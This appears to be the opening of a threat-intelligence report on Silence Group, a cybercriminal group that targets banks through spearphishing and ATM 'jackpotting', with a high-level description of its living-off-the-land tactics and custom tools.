Threat Actor: Silence Group
Active since 2016, Silence Group is a cybercriminal organization that targets banks, specifically stealing information used in the payment card industry. The modus operandi of the Silence Group is simple. It is to make as much money as possible by compromising targets, in this case banks, via a spearphishing strategy, which will then lead to exfiltrating financial data as well as enabling the attackers to "Jackpot" ATMs to withdraw money.
To achieve these goals, the Silence Group is known to utilize publicly available tools that they repurpose, as well as use a technique that the cybersecurity industry refers to as "living off the land." What this essentially means is that they attempt to operate as long as possible using the preexisting tools or commands built into the operating system of their target to effectively maximize the time they are able to spend within the target environment. This strategy has two benefits: first, using locally available tools helps them better evade detection, and second, it helps them establish a deeper and stronger foothold.
However, the group does not exclusively rely on publicly available tools. They are also known to write their own sets of modular, custom tools. As the motivations and various TTPs of their living-off-the-land strategy have been documented previously, we will focus on the details of those custom tools developed exclusively by this group.
For more information on the TTPs used by the Silence Group, read the blog listed in the appendix and go to our Playbook Viewer and select Silence Group from the menu.